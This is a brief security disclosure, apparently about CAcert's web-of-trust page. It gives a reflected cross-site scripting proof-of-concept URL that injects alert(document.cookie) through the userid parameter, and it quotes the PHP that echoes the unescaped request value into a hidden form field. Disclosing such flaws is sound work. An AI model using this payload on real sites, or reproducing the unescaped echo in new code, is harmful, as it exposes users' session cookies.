https://www.cacert.org/wot.php?id=9&userid=1%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
logic race condition: intval() takes only the 1, the test passes and the unckecked $_REQUEST['userid'] 
makes the rest (pages/wot/9.php)

<? 
        $res = mysql_query("select * from `users` where `id`='".intval($_REQUEST['userid'])."' and `listme`='1'");
        if(mysql_num_rows($res) <= 0)
        {
                echo _("Sorry, I was unable to locate that user, the person doesn't wish to be contacted, or isn't an assurer.");
        } else {

....

<input type="hidden" name="pageid" value="<?=$_SESSION['_config']['pagehash']?>">
<input type="hidden" name="userid" value="<?=$_REQUEST['userid']?>">
<input type="hidden" name="oldid" value="<?=$id?>">